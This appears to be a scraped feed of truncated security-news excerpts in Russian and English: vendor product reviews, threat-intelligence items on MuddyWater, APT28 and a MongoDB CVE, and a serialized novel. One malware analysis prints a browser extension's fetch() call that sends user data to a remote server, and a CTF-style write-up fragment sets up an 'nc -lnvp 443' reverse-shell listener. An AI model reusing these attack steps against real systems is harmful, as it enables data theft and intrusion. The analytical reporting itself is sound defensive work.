Праздничное хобби превратилось в репозиторий, где «посредником» между идеей и кодом стал не человек.

Перепайка чипов, новая плата и прошивка SPD позволили получить XMP DDR5-6400 CL32.

Продажи рухнули на дикие 64%, потому что машины застряли между хакерами и пошлинами.

Птицам такое даже не снилось.

Meta знала, но считала это «не проблемой приватности».

ИБ-шники в шоке, хакеры и противники в восторге.

21 тысяча подписчиков в Telegram, $355 тысяч украденных за год, задержания от Праги до Теннесси.

История одного отчаянного маркетолога.

Pandora будет следить за звездами и планетами вместе, чтобы не перепутать пятна на светиле с «дымкой» в атмосфере.

Ученые показали, что мотивация может быть намеренно «приглушена» мозговой цепью при стрессе.

Новая политика RemoveMicrosoftCopilotApp убирает приложение, если оно не ставилось пользователем и не запускалось 28 дней.

… а потребляют как обычная лампочка.

E-6B получит новые передатчики за $20 млн на случай Апокалипсиса.

AIR превратила управление самолетом в компьютерную игру, где электроника исправляет ошибки человека.

Пользователи по всему миру получают уведомления о взломе.

На смену срочности и необходимости простой замены пришёл запрос на качество, гарантированную совместимость компонентов и экономическую эффективность решений.

Вендорам и интеграторам пришлось отвечать на этот вызов, делая ставку не на единичные продукты, а на создание или встраивание в доверенные экосистемы.

в промышленном сегменте, выпустили новое решение для резервного копирования и серьёзно продвинулись в области инфраструктурных решений для искусственного интеллекта.

Андрей Крючков, директор по развитию технологических партнёрств, компания «Киберпротект»Валентин Губарев: «Наша стратегия в этом году строилась на 3 ключевых фокусах.

Год показал, что будущее отечественных информационных тех…

Автоматизировать процесс внедрения стандартов и комплаенс-контроль по этому сценарию поможет модуль MaxPatrol Host Compliance Control (MaxPatrol HCC) в составе MaxPatrol VM.

Как MaxPatrol HCC делает комплаенс-контроль и харденинг прощеMaxPatrol HCC — это модуль для MaxPatrol VM, который позволяет приоритизировать риски, назначать политики безопасности, контролировать выполнение требований и сроки устранения несоответствий.

Возможность разрабатывать собственные стандарты или адаптировать системные, включая стандарты PT Essentials, с помощью встроенного в MaxPatrol HCC конструктора.

В MaxPatrol HCC уже реализованы готовые стандарты, интегрированные в продукт.

Дашборды в MaxPatrol HCC для ключ…

Флагманское решение вендора — сервер управления аутентификацией Blitz Identity Provider, позволяющий избавиться от неудобств парольной защиты и усилить ИБ организации.

Схема работы Blitz Identity ProviderНовые возможности Blitz Identity Provider 5.31:Мобильное приложение Blitz Key для подтверждения входа через push и с помощью TOTP-генераторов кодов подтверждений.

Архитектура Blitz Identity ProviderПомимо сервиса аутентификации, Blitz Identity Provider включает следующие модули:Blitz Panel.

Графический интерфейс Blitz PanelРабота с системой Blitz Identity ProviderРассмотрим вкратце развёртывание и настройку сервера аутентификации Blitz Identity Provider, чтобы продемонстрировать возможности…

Мы проанализируем, как изменился ландшафт угроз, куда движется рынок, на что делать ставку в 2026 году и как в новой реальности выстроить работу, которая позволит не просто выживать, но и уверенно развиваться.

Екатерина Черун, коммерческий директор, Security VisionАтаки на репозиторииИлья Шабанов отметил, что в 2025 году стали сильно заметнее атаки на репозитории кода, такие как Git и NPM.

Алексей Павлов в ответ подчеркнул, что в случае подобных сложных инцидентов необходимо привлекать профессионалов и проводить полномасштабную работу.

Александр Лебедев отметил, что в определённой степени отрасль уже получила «прививку» от подобных угроз благодаря инциденту с Protestware в 2022 году.

Их сут…

И ключевую роль в ней играет NDR (Network Detection and Response) — модуль, который видит атаку не с конца и не с начала, а целиком, на уровне сетевых коммуникаций.

Таким образом, ключевое различие в том, что NTA предоставляет данные для расследования ИБ-инцидентов, а NDR — это готовый инструмент для расследования и реагирования.

Отметим, что и до появления NDR в KATA были модули по распознаванию угроз в копии сетевого трафика.

NDR как стратегияИнтеграция NDR в экосистему защиты, как это реализовано в платформе KATA, — это качественный сдвиг в стратегии противодействия целевым атакам.

Однако ключевой инсайт заключается не в самой технологии, а в изменении подхода к расследованию.

Servicepipe Cybert обеспечивает защиту от нежелательной автоматизации в веб-трафике (в том числе OWASP Automated Threats) и в зависимости от схемы внедрения защищает от volumetric L3/L4 и/или L7 DDoS-атак.

Реализованная в Servicepipe Cybert функциональность:Защита от DDoS-атак на уровнях L3–L7 с автоматическим срабатыванием (в реальном времени).

On-prem модель защиты (NGINX-модуль)On-prem модель подразумевает локальную установку ПО Cybert в качестве модуля на веб-сервера NGINX или Angie в контуре заказчика.

Расширенная аналитика в Servicepipe CybertЛоги запросов (Request logs)В данном разделе отображается вся информация о запросах, которые поступают к ресурсу.

Настройки ресурсаПользовательс…

RuSIEM WAF 1.0 обеспечивает защиту веб-приложений от атак и уязвимостей.

Версия 1.0 RuSIEM WAF позволяет снизить перечисленные угрозы, обеспечивая защиту веб-приложений от атак.

Функциональные возможности RuSIEM WAF 1.0RuSIEM WAF — интеллектуальная система защиты веб-приложений от атак и уязвимостей.

Создание учётной записи пользователя в RuSIEM WAF 1.0После выполнения настроек сведения о состоянии веб-приложения отображаются на панели мониторинга.

Архитектура движка обработки правил AegisФункциональность балансировки нагрузки в RuSIEM WAF позволяет распределять входящие запросы между несколькими серверами, что повышает надёжность и производительность системы.

Во-вторых, такие инциденты несут в себе не только технологические, но и кадровые, юридические и репутационные риски.

После 2020 года с массовым переходом на удалённую работу и изменениями в законодательстве учёт рабочего времени в DLP-системах стал стандартной необходимостью.

Контроль информации и документов: мониторинг мест хранения, перемещения и круга лиц, имеющих к ним доступ.

Александр Луганцев обратил внимание на правовой контекст, пояснив, что с точки зрения государства инциденты могут классифицироваться по нормам гражданского, административного или уголовного права.

Как показала дискуссия экспертов и опыт участников, ключ к успеху лежит в системном подходе, который начинается задолг…

Архитектура, системные требования и лицензированиеКомпоненты платформы DeteAct EASM размещаются на облачных ресурсах, арендованных в ИТ-компаниях «Селектел» и «Яндекс.Облако».

Запуск сканирования с текущими настройкамиПри создании нового сканирования необходимо задать его название, выбрать тип («Разведка»/«Инфраструктура»), указать ID воркера, указать настройки запуска.

Домены в DeteAct EASMИнтерфейс и функциональность раздела «IP-адреса» аналогичен разделу «Домены», разница заключается только в нескольких полях.

Фильтрация веб-сервисов в DeteAct EASMУправление уязвимостямиВ разделе «Уязвимости» отображается информация, полученная от сетевых сканеров.

Оценка соответствия в DeteAct EASMВывод…

Positive Technologies представил PT Dephaze для безопасного внутреннего автопентеста.

Функциональные возможности PT Dephaze 3.0Концепция PT Dephaze — постоянная оценка защищённости внутренней инфраструктуры через реальные атаки, которые используются злоумышленниками и пентестерами.

Как работает PT Dephaze 3.0Принцип работы PT Dephaze схож с ручным тестированием: продукт последовательно анализирует системы и их компоненты, предпринимая попытки эксплуатации недостатков, перехвата данных из трафика для компрометации систем.

Возможности PT Dephaze 3.0 позволяют:ограничивать область тестирования;исключать из проверки критичные бизнес-активы;настраивать параметры отдельных атак;согласовывать дейс…

Владимир Зуев , технический директор центра мониторинга и реагирования на кибератаки RED Security SOC, RED Security.

, технический директор центра мониторинга и реагирования на кибератаки RED Security SOC, RED Security.

При этом первый шаг — это грамотная оценка ситуации: нужно понять, какие именно данные потребуются для расследования, и доходчиво объяснить клиенту, что и с каких систем необходимо собрать.

После работы команды реагирования и расследования часто не проводится работа по устранению уязвимостей и усилению защиты, что делает повторение инцидента лишь вопросом времени.

Когда же подобных случаев накапливается несколько, их решение становится быстрым и как раз поддаётся автоматизац…

Система удалённого мониторинга и управления АССИСТЕНТ, разработанная компанией «САФИБ», принесёт безопасность и прозрачность в процессы управления инфраструктурой.

Объединение и настройка всех компонентов в одном месте обеспечивает прозрачность управления и масштабируемость при работе как с внутренними, так и с клиентскими инфраструктурами.

Управление политиками устройств и сотрудниковПри добавлении устройствам и сотрудникам назначаются политики безопасности и доступа.

Набор собираемых данных достаточно широк и включает:информацию об оборудовании;установленное ПО;информацию и историю обновлений Windows;содержимое каталогов Program Files и автозагрузки;данные об антивирусном ПО и брандмауэре…

Сегодня защита корпоративных коммуникаций вышла за рамки технической задачи ИТ-отделов и превратилась в стратегический приоритет, непосредственно влияющий на репутацию, финансовую стабильность и само существование компании.

Понимание и реализация эффективной защиты коммуникаций — это не просто техническая задача.

Угрозы при использовании небезопасных средств корпоративных коммуникацийИспользование несанкционированных средств коммуникаций — личных мессенджеров и аккаунтов в сервисах видеосвязи — создаёт для компании «слепые зоны» и серьёзные риски утечки данных.

Это создаёт серьёзные риски для безопасности, утечки данных и соответствия нормативным требованиям, поскольку данные инструменты об…

Для противодействия перечисленным угрозам Positive Technologies разработала продукт для защиты конечных устройств от сложных и целевых атак MaxPatrol Endpoint Detection and Response (MaxPatrol EDR).

Редактирование стандартной роли в MaxPatrol EDR 8.1АдминистрированиеАгент MaxPatrol EDR устанавливается на сервер или рабочую станцию и изначально не содержит активных модулей или функциональной нагрузки.

Работа с пользовательскими правилами осуществляется в компоненте PT Knowledge Base, общем для MaxPatrol SIEM и MaxPatrol EDR.

Системные требования MaxPatrol EDR 8.1 и лицензированиеMaxPatrol EDR применяется совместно с системой MaxPatrol SIEM версии 27.2, 27.3 или 27.4.

MaxPatrol EDR использует…

Основные функциональные характеристики СУБД JatobaЗащищённая СУБД Jatoba основана на модернизированном ядре СУБД с открытым кодом PostgreSQL.

Централизованное управление СУБД Jatoba и другими СУБД на PostgreSQLКомпонент веб-интерфейса Jatoba Data Safe (JDS) предназначен для администраторов СУБД, специалистов по безопасности и аудиторов безопасности.

Функциональные возможности позволяют администрировать как СУБД Jatoba, так и другие СУБД на базе PostgreSQL.

Релевантность СУБД Jatoba трендам развития рынка СУБДПродуктовая команда Jatoba учитывает в развитии СУБД практически все рыночные тренды, такие как:Облачные среды, СУБД как сервис DBaaS.

Поддержка отказоустойчивых и геораспределённых кла…

Сейчас атака начинается не с техники, а с общения.

Не с эксплойта, а с сообщения в мессенджере, с вежливой (или, наоборот, провокационной) просьбы «подсказать» или «помочь».

Технически подкованные специалисты уязвимы в связи с тем, что: имеют большой опыт и знания, которыми делятся на разных платформах и в соц.сетях.

Для публичных специалистов деньги часто используются не как оплата услуги, а как инструмент давления, ускорения и подмены ролей.

Чего изоляция не делает: не отменяет юридической ответственности и не защищает от репутационных рисков.

Что реально изменилосьПовышена безопасность цепочек поставок (минимизированы риски подобных атак).

Значит, контроль цепочек поставок именно Java-экосистемы становится ключевым элементом всей ИБ-стратегии.

Выводы для инженеровРиски цепочек поставок — это инженерная проблема, а не только задача ИБ.

Опыт ЕДИНОГО ЦУПИС показал, что контроль цепочки поставок в Java можно встроить в существующий процесс разработки без слома CI/CD и без остановки релизов.

И для высоконагруженных систем это уже не вопрос «безопасности», а базовая инженерная практика: так же обязательная, как мониторинг, бэкапы и контроль отказов.

Современные вредоносные расширения для браузеров всё реже выглядят как откровенно опасный код.

Вместо эксплуатации уязвимостей они маскируются под легитимные AI‑инструменты, «умные чаты» и помощники для повышения продуктивности.

В этой статье разбирается Chrome‑расширение, позиционируемое как AI‑чат, но фактически реализующее механизм скрытого мониторинга активности пользователя с последующей передачей данных на удалённый сервер.

Передача данных на удалённый серверfetch(globlChatVars.baseUrl + "switchModel", { method: "POST", body: JSON.stringify({ model: payload }) });Удалённый сервер:https://chatsaigpt.com/ext2/На сервер передаются агрегированные данные активности пользователя и AI‑чата б…

HTML injectionОбычно, если никаких интересных вещей типа command injection и RFI/LFI я не нахожу, то перехожу к расммотрению механизма авторизации и логина.

Проверяем функцию загрузки баннера и в отличии от загрузки в основном сайте, здесь мы можем подгружать произвольные файлы и не только картинки.

Запускаем nc -lnvp 443 и триггерим SQL:И ... и... в итоге, тишина.

Здесь как и в прошлой учетке крайне ограничены команды cmd и powershell .

Потому что я старался не только пошагово все решить, но и обсудить возможные ошибки и альтернативные пути.

С одной стороны, свобода слова и действий это хорошо и правильно, но с другой эта свобода может помешать другим людям.

Это не только злой российский тренд, буквально весь мир закрывается и создает свои национальные мессенджеры и сервисы и это не так плохо, вы пользуетесь Российскими банками, пользуетесь озоном вб авито.

А еще вспомним что на 100 тысяч населения в такой свободной стране как США 542 заключенных, а в России 300.

А что по Китаю?

Некоторые люди комментариях даже могут спокойно написать свое несогласие с Роскомнадзором, но в Китае или Северной Корее вы бы с делать этого не смогли.

И как итог все ваши усилия сделать на каждом сервисе разный пароль идет коту под животЛучше не использовать пароли по шаблону, потому что вы на корню подры*аете принцип разные пароли под разные сервисыПлохие шаблоныНе буду растягивать статью, просто скажу, что вот такие пароли не используйтеp@ssw0rd!

Слова должны быть независимыми и не связанными, например limon_sneg_truba.

У вас могут быть какие-то ассоциации, но главное чтобы никто кроме вас их не знал и не мог догадаться и слова должны быть реально случайными, а то какой-нибудь sobaka-kot-lubov можно сразу в помойку.

Длинная фраза на русскомЭтот совет схож с предыдущим, но тут мы усиливаем запоминание за счет смысловой нагрузки фразы, на…

Уязвимость в ПО, при которой приложение динамически формирует исполняемый код, используя недоверенные входные данные пользователя без санитизации*.

Уязвимость в ПО, при которой приложение включает недоверенные данные от пользователя в системные команды без экранирования специальных символов, интерпретируемых оболочкой ОС.

Кроме того, растет зрелость вендоров российского ПО — они выделяют больше ресурсов на определение уязвимостей в ПО, их устранение и регистрацию в базах уязвимостей (прежде всего БДУ ФСТЭК).

В 2026 году мы ожидаем продолжения возрастания доли трендовых уязвимостей в отечественных продуктах и преобладающей доли таких уязвимостей в продуктах софтверного гиганта Microsoft.

В н…

для себя, для семьи, ну и с друзьями поделился бы".

Дело даже вообще не в спорном политическом контенте.

Уже не с ...PN.

И не сопротивлялся.

Nginx на 443 порту, проксирует WebSocket путь на ...ray: Nginx конфиг: ...ray конфиг: 🎯 Что рекомендую?

Захлопнул дверь подсобки и ушёл, будто меня там и не было.

Мы хотели показать, на что способен мотивированный атакующий с помощью смеси социальной инженерии, физического взлома и проверенных на практике тактик.

Подделали номер телефона менеджера, отправили с поддельного адреса письмо и вошли с парадного входа с липовой историей, но настоящим паспортом.

Поставить камеры с датчиками движения в ключевых местах: у принтеров, в кладовках и в коридорах по пути в серверную.

Внедрить умные системы, которые будут замечать странности в сети и в том, как люди используют свои карты доступа.

Это не магия — это математика сложных систем.

Эволюция кооперацииВ контексте эволюционной биологии мораль можно рассматривать не как набор абсолютных истин, а как результат естественного отбора на уровне популяций.

Модель "дилемма заключенного" показывает, что в краткосрочной перспективе предательство может быть выгодным, но в повторяющихся взаимодействиях стратегии кооперации оказываются более эффективными.

"Не убий" — это не просто этическая заповедь.

Это не гарантирует безопасности, но, это более устойчивый подход.

700 000 рублей — это не про «знать Python» или «иметь 10 лет опыта».

В принципе, это выродилось не в то, что мы все стали специалистами по DevOps, а в то, что вообще появилась профессия DevOps.

При этом затягивание поясов происходит не в части зарплат, а в части оценки проектов.

И пояса затягиваются, но они затягиваются не в части зарплат — они затягиваются в части оценки критичности и нужности отдельных проектов.

ИИ в этом контексте — не угроза и не панацея.

После неудачного поиска работы я решил дальше учиться, чтобы подтянуть свои навыки в вебе и в будущем заняться баг-хантингом.

Иначе после прохождения обучения очень сложно доказать работодателю при просмотре резюме, что я что-то действительно знаю.

После небольшого исследования мой выбор пал на два сертификата: Certified Web Exploitation Specialist (HTB CWES) от HTB и Burp Suite Certified Practitioner (BSCP) от PortSwigger.

К самому контенту вопросов вообще нет: всё четко, ясно и по делу.

На реальном же экзамене тебе просто дают приложение, которое нужно взломать, и ты сам должен догадаться, на что его тестить.

ПредисловиеТак уж случилось, что из разработки железа и встроенного ПО я постепенно ушел в безопасность.

А в дальнейшем и в пентест.

Тайминги чтения нужного нам бита в конкретном случае лежат в районе 30-60 миллисекунд после ресета в зависимости от тактовой частоты.

В итоге нам нужно сгенерировать импульс максимально возможно контролиремый как по длительности, так и по таймингу.

И не забудьте- один такой упешный взлом это в среднем несколько дней такого вот железного брутфорса.

Новый год начался, и мы продолжаем рассказывать про кибертренды и делать киберпрогнозы.

Применение AI, ML в российских решениях для кибербезопасностиИспользование технологий AI и ML в средствах защиты стал ключевым трендом 2025 года.

В случае с песочницей в модуль поведенческого анализа встроена модель машинного обучения, анализирующая HTTP-трафик, записанный после запуска вредоносного образца в песочнице.

В PT NAD, в свою очередь, реализован механизм пользовательских правил профилирования, который заточен на гибкий поиск аномалий в сетевом трафике.

Уверены, что тренд сохранится в ближайшие годы и направление, связанное с облачными технологиями, будет развиваться быстрее других в сфере ИТ и…

Это типичный приём вредоносного ПО, позволяющий:загружать код динамически;исполнять его в обход простых сигнатур;скрывать реальную логику от ревью.

Это не случайность, а осознанная маскировка:ухудшение читаемости;снижение шансов на ручной аудит;демонстративное игнорирование поддержки и легитимности.

exports.interpreter=e() : t.interpreter=e() }(self,function(){ ... })Этот код не является частью бизнес‑логики расширения.

Динамическая доставка кодасервер AES C2 payload decrypt interpreter.run()Код:отсутствует в Chrome Web Store;появляется после установки ;полностью контролируется оператором.

Функциональность расширения может быть изменена в любой момент, и пользователь не имеет над этим никак…

— кто‑то рва­нул его за рукав, и в этот момент Кирилл рез­ко дер­нулся в сто­рону, тол­кнув бли­жай­шего гоп­ника пле­чом.

Тот не удер­жался, пос­коль­знул­ся на мок­ром асфаль­те и грох­нулся в лужу с гряз­ным всплес­ком и не менее гряз­ными матюга­ми.

За ночь он потем­нел и стал лиловым по кра­ям, и это в тот самый день, ког­да Кирилл собирал­ся навес­тить рай­онную адми­нис­тра­цию.

Он нацепил на нос куп­ленные по дороге тем­ные очки с боль­шими стек­лами и с сом­нени­ем осмотрел себя в зер­кале.

Щел­кну­ла двер­ца, из машины выб­рался Жора в мод­ной зам­шевой кур­тке и с кожаной бар­сеткой в руке.

— устре­мив на вошед­шего мут­ный взор, спро­сил он и велел закатать рукава, что­бы про­верить вены.

А вот у кабине­та пси­хиат­ра соб­ралась изрядная тол­па, к которой Кирилл и при­соеди­нил­ся, поин­тересо­вав­шись, кто тут пос­ледний.

Затем в ход пош­ли исто­рии, начинав­шиеся оди­нако­во: «а еще у нас был слу­чай…», и Кирилл уже не знал, куда девать­ся от это­го сло­воохот­ливого граж­данина.

Я пытал­ся объ­яснить, что у меня Linux, но они утвер­жда­ют, буд­то это не аргу­мент…Ва­силий мор­гнул, при­кусил губу и слег­ка отод­винул­ся к стен­ке.

— Ну, ты это, дер­жись... и не болей.

Как говорил Аль­берт Эйнштейн, «бес­конеч­ны толь­ко Все­лен­ная и глу­пость челове­чес­кая», и в этом Кирилл был пол­ностью солида­рен с великим уче­ным.

— Купим тебе флеш­ку, — пообе­щал Кирилл, с инте­ресом раз­гля­дывая получив­шиеся макеты на экра­не.

— В общем‑то, я и на фес­тивале порабо­тать могу, — надув розовый пузырь, пред­ложила девуш­ка.

На потем­невшей от вре­мени чер­ной эма­ли кра­сова­лись золотис­то‑жел­тые бук­вы: «Учеб­но‑спор­тивное объ­еди­нение ДОСА­АФ», а ниже вид­нелась еще одна нев­зрач­ная таб­личка: «Автошко­ла».

Сом­нения дли­лись счи­таные секун­ды: нацепив на ногу мок­рый ботинок, Кирилл решитель­но взбе­жал по сту­пеням и тол­кнул тяжелую деревян­ную дверь.

Это­му або­нен­ту сле­дова­ло отве­тить, даже нес­мотря на то, что тот решил раз­будить его в девять часов утра, да еще и в выход­ной.

Осо­быми литера­тур­ными талан­тами он пох­вастать­ся не мог, да и в рек­ламе был не слиш­ком иску­шен, одна­ко твор­ческий про­цесс увлек его не на шут­ку.

Ее он и запос­тил на нес­коль­ко форумов, а потом взгля­нул на часы и ужас­нулся: за работой про­лете­ло пол­дня, и Кирилл уже понем­ногу опаз­дывал на намечен­ную встре­чу.

— При­вет, — бро­сил Жора, при­сажи­ваясь нап­ротив, — изви­ни, что задер­жался, в редак­ции, как обыч­но, дур­дом и бед­лам.

Ки­рилл с инте­ресом рас­смат­ривал вошед­шего: лет око­ло сорока, седе­ющие гус­тые волосы, буд­то слу­чай…

Так и помер в сви­нар­нике.

Так он, от них спа­саясь, в окно и вышел.

Его так и под­мывало поин­тересо­вать­ся нап­рямую, отку­да все‑таки у Бориса Семено­вича взя­лись столь глу­бокие поз­нания в генера­торах и клю­чах.

— В прин­ципе, мож­но… — Кирилл при­кинул в уме, что понадо­бит­ся для реали­зации этой затеи, и потянул­ся за сле­дующим кус­ком.

— Может, и так, — хмык­нул сосед, — но на вся­кий слу­чай ста­рай­ся лиш­ний раз не све­тить­ся в интерне­те.

Ничего не изме­нилось, и воз­вра­щать­ся к это­му я не хочу».

И я не жду воз­вра­щения прош­лого.

Я не хочу уго­вари­вать тебя, но мне важ­но знать, что с тобой всё в поряд­ке и ты счас­тли­ва.

В соз­нании про­мель­кну­ла пос­ледняя осоз­нанная мысль о том, что с ноч­ными бде­ниями пора бы уже завязы­вать, и с нею он пог­рузил­ся в сон.

Но я могу ему что‑нибудь передать, если хотите.

Котенок показал язык уже во весь экран, в отдель­ном окош­ке без каких‑либо эле­мен­тов навига­ции, кро­ме стан­дар­тных кно­пок «зак­рыть‑свер­нуть», и он неволь­но усмехнул­ся.

Он на секун­ду зак­рыл гла­за, прис­лушал­ся к себе.

Стан­дар­тные user , password и email не подош­ли, и Кирилл начал переби­рать вари­анты с раз­личны­ми пре­фик­сами и окон­чани­ями.

Что ж, пус­кай заокеан­ская машина тру­дит­ся, а он тем вре­менем может занять­ся чем‑нибудь дру­гим.

Что­бы успо­коить его, Кирилл зак­рыл лиш­нюю вклад­ку бра­узе­ра, и в этот самый момент нас­тупив­шую тишину нарушил тре­вож­ный треск двер­ного звон­ка.

За­кинув пакет с покуп­ками домой и спря­тав все ско­ропор­тяще­еся в холодиль­ник, Кирилл пере­обул­ся в домаш­ние шле­пан­цы и пересек лес­тнич­ную пло­щад­ку.

Сосед­ская дверь и впрямь ока­залась не запер­та: за ней обна­ружи­лась тес­ная при­хожая, в точ­ности такая же, как и в его однушке.

— Вот, взгля­ни, какая беда прик­лючилась, — посето­вал Борис Семено­вич, с крях­тени­ем усту­пая сво­ему гос­тю мес­то за пись­мен­ным сто­лом.

— кряк­нул Борис Семено­вич и с досадой почесал в затыл­ке.

— М‑м-м, — про­тянул Борис Семено­вич, и Кирилл ожи­вил­ся:— И что­бы сов­сем прос­то: возь­мем два огромных чис­ла, перем­ножим — это быс­тро.

Ки­рилл взгля­нул на часы и поежил­ся: он по сво­ему обык­новению явил­ся на встре­чу чуть рань­ше наз­начен­ного вре­мени и уже успел осно­ватель­но замер­знуть.

Да и не тонет такое… Это мне Кущин рас­ска­зал, а он в теме.

А тут под­вернул­ся отличный слу­чай про­верить теорию на прак­тике, да не пер­выми уда­рить, а как бы отве­тить на внеш­нее втор­жение.

Они ведь там уве­рены, что ата­ка на «Тер­ру» была сан­кци­они­рова­на на государс­твен­ном уров­не…— И что‑то мне под­ска­зыва­ет, что это не прям стоп­роцен­тное заб­лужде­ние.

Зап­рещать отправ­ку содер­жимого фор­мы отдель­ным поль­зовате­лям он не умел, мак­симум, на что был спо­собен, — зафик­сировать дату и вре­мя пуб­ликации каж…

И не ска­жешь точ­но, сколь­ко ему лет: острые чер­ты лица казались какими‑то вне­воз­рас­тны­ми, точ­но у ликов на древ­них ико­нах.

Гля­дя в экран, он не мог отде­лать­ся от ощу­щения, буд­то слу­чай­но заг­лянул в окно заб­рошен­ной лабора­тории, где кто‑то про­дол­жает начатый невесть ког­да экспе­римент.

Любопытс­тво обжи­гало, как рас­кален­ное железо в куз­нечном гор­не, но Кирилл боял­ся нарушить мол­чание, ругая себя за вне­зап­но накатив­шую робость.

С голоду он, конеч­но, не пом­рет, на форумах всег­да под­кинут какую‑нибудь хал­туру, дело вов­се не в этом — пугало отсутс­твие дол­госроч­ных пла­нов.

Ки­рилл не отве­тил.

Затем, как и год назад, новые гла­вы ста­нут пуб­ликовать­ся раз в неделю, по суб­ботам, и будут дос­тупны под­писчи­кам.

Так сидел Сань­ка — веч­но сос­редото­чен­ный и в то же вре­мя рас­слаб­ленный, с видом челове­ка, готово­го в любую минуту вско­чить и куда‑то бежать сло­мя голову.

Кни­ги выс­тро­ились ряд­ком на пол­ке, как сол­даты на параде, а вот и тот самый сис­темник — с него ког­да‑то все началось.

Мож­но было и не ста­рать­ся: зре­ние с недав­них пор сов­сем испорти­лось, ничего там не раз­гля­деть, кро­ме мут­ной серой пелены.

Кажет­ся, пару месяцев назад… Это с рабочих стан­ций, а с сер­вака — так вооб­ще при царе Горохе… За спи­ной раз­далось зна­комое сопение.

Если ты планируешь собрать коллекцию бумажных сборников «Хакера» с лучшими материалами последних лет, сейчас самое время.

Бумажные журналы — это артефакт, который можно взять в руки, полистать и поставить на полку.

И всегда круто иметь подшивку лучших материалов «Хакера» в печатном формате.

В него вошли лучшие статьи за 2019–2021 годы, включая материалы про Active Directory, SDR, checkm8, VeraCrypt и не только.

Каждая статья по традиции снабжена комментариями, позволяющими узнать больше о работе редакции.

В этом же году, но вес­ной вышел кол­лекци­онный спец­выпуск под номером три с луч­шими стать­ями за 2019–2021 годы.

В 2024 году в «Хакере» дебюти­ровал mr.grogrig с отличны­ми стать­ями про взлом игр.

Две темы номера в этом году были намерен­но хай­повыми и лай­товыми: про Android и про Minecraft.

В выпус­ке про Android мощ­но выс­тупил Polski Kot со стать­ей «Ан­дро­иды с root» (о том, каково живет­ся в 2025 году с рутован­ным аппа­ратом) и об­зором GrapheneOS.

Гла­вы начали выходить еще в 2024-м, а в новогод­ние праз­дни­ки мы решили пулять по одной ежед­невно.

ИБ-специалисты предупреждают, что в сети по-прежнему доступно более 87 000 уязвимых серверов.

Уязвимость затрагивает множество версий MongoDB и MongoDB Server:MongoDB 8.2.0 — 8.2.3;MongoDB 8.0.0 — 8.0.16;MongoDB 7.0.0 — 7.0.26;MongoDB 6.0.0 — 6.0.26;MongoDB 5.0.0 — 5.0.31;MongoDB 4.4.0 — 4.4.29;все версии MongoDB Server 4.2;все версии MongoDB Server 4.0;все версии MongoDB Server 3.6.

В свою очередь специалисты компании Wiz сообщали, что уязвимость может оказать значительное влияние на облачные среды, так как 42% всех наблюдаемых ими систем «имеют как минимум один инстанс MongoDB в версии, уязвимой перед CVE-2025-14847».

В своем отчете эксперты подчеркивают, что уже фиксируют эксплуатацию Mo…

The Iranian threat actor known as MuddyWater has been attributed to a spear-phishing campaign targeting diplomatic, maritime, financial, and telecom entities in the Middle East with a Rust-based implant codenamed RustyWater.

Also tracked as Mango Sandstorm, Static Kitten, and TA450, the hacking group is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS).

Also referred to as Archer RAT and RUSTRIC, RustyWater gathers victim machine information, detects installed security software, sets up persistence by means of a Windows Registry key, and establishes contact with a command-and-control (C2) server ("nomercys.it[.

"Historically, MuddyWater has relied on PowerSh…

Europol on Friday announced the arrest of 34 individuals in Spain who are alleged to be part of an international criminal organization called Black Axe.

It's estimated that the criminal network is responsible for fraud resulting in damages exceeding €5.93 million ($6.9 million).

The organization is said to have about 30,000 registered members, and other affiliates such as money mules and facilitators.

These efforts also led to over 400 arrests and the identification of thousands of additional suspects.

"Black Axe is one of the most prominent West African transnational organized crime syndicates, with operations in cyber fraud, human trafficking, drug smuggling, and violent crimes both withi…

Chinese-speaking threat actors are suspected to have leveraged a compromised SonicWall VPN appliance as an initial access vector to deploy a VMware ESXi exploit that may have been developed as far back as February 2024.

Successful exploitation of the issue could permit a malicious actor with admin privileges to leak memory from the Virtual Machine Executable (VMX) process or execute code as the VMX process.

This final stage corresponds to CVE-2025-22225, which VMware describes as an 'arbitrary write vulnerability' that allows 'escaping the sandbox.'"

The client supports the ability to download files from ESXi to the VM, upload files from the VM to ESXi, and execute shell commands on the hyp…

The activity has been attributed to APT28 (aka BlueDelta), which was attributed to a "sustained" credential-harvesting campaign targeting users of UKR[.

APT28 is associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).

"These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities."

The attack chain starts with a phishing email containing a shortened link that, when clicked, redirects victims to another link hosted on webhook[.

"These campaigns underscore the GRU's sustained commitment to credential harves…

As organizations plan for 2026, cybersecurity predictions are everywhere.

The real challenge isn't a lack of forecasts—it's identifying which predictions reflect real, emerging risks and which can safely be ignored.

These developments highlight a growing gap between popular cybersecurity predictions and the risks that should genuinely influence security strategy.

Backed by research and real-world data, the webinar helps security and IT leaders differentiate sensational headlines from actionable, evidence-based predictions.

Register for the Bitdefender webinar to gain a practical, research-backed view of the cybersecurity predictions that should define your security strategy for 2026.

Trend Micro has released security updates to address multiple security vulnerabilities impacting on-premise versions of Apex Central for Windows, including a critical bug that could result in arbitrary code execution.

The vulnerability, tracked as CVE-2025-69258, carries a CVSS score of 9.8 out of a maximum of 10.0.

"A LoadLibraryEX vulnerability in Trend Micro Apex Central could allow an unauthenticated remote attacker to load an attacker-controlled DLL into a key executable, leading to execution of attacker-supplied code under the context of SYSTEM on affected installations," the cybersecurity company said.

The issues impact Apex Central on-premise versions below Build 7190.

Trend Micro n…

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday said it's retiring 10 emergency directives (Eds) that were issued between 2019 and 2024.

"As the operational lead for federal cybersecurity, CISA leverages its authorities to strengthen federal systems and defend against unacceptable risks, especially those related to hostile nation-state actors," said CISA Acting Director Madhu Gottumukkala.

"The closure of these ten Emergency Directives reflects CISA's commitment to operational collaboration across the federal enterprise.

"Every day, CISA's exceptional team works collaboratively with partners to eliminate persistent access, counter emerging threats, and deliver r…

The U.S. Federal Bureau of Investigation (FBI) on Thursday released an advisory warning of North Korean state-sponsored threat actors leveraging malicious QR codes in spear-phishing campaigns targeting entities in the country.

"As of 2025, Kimsuky actors have targeted think tanks, academic institutions, and both U.S. and foreign government entities with embedded malicious Quick Response (QR) codes in spear-phishing campaigns," the FBI said in the flash alert.

Kimsuky, also tracked as APT43, Black Banshee, Emerald Sleet, Springtail, TA427, and Velvet Chollima, is a threat group that's assessed to be affiliated with North Korea's Reconnaissance General Bureau (RGB).

It has a long history of o…

